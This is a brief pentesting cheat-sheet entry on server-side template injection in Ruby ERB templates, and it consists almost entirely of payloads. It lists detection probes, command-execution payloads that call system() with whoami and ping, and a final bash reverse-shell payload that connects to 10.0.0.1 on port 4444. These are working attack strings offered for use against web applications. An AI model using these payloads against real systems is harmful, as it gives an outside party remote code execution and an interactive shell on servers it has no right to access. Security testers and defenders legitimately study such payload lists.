ERB SSTI
Last modified: 2024-04-13
Web
ERB may be vulnerable to SSTI.
Payloads
Try the following payloads on URL path, params, input, etc.
<%= 7*7 %>
<%= user.username %>
<%= system("whoami"); %>
Exploit
If the above payloads affect responses, we can inject arbitrary code as below:
<%= system("ping -c 1 10.0.0.1"); %>
# Reverse Shell
<%= system("bash -i >& /dev/tcp/10.0.0.1/4444 0>&1"); %>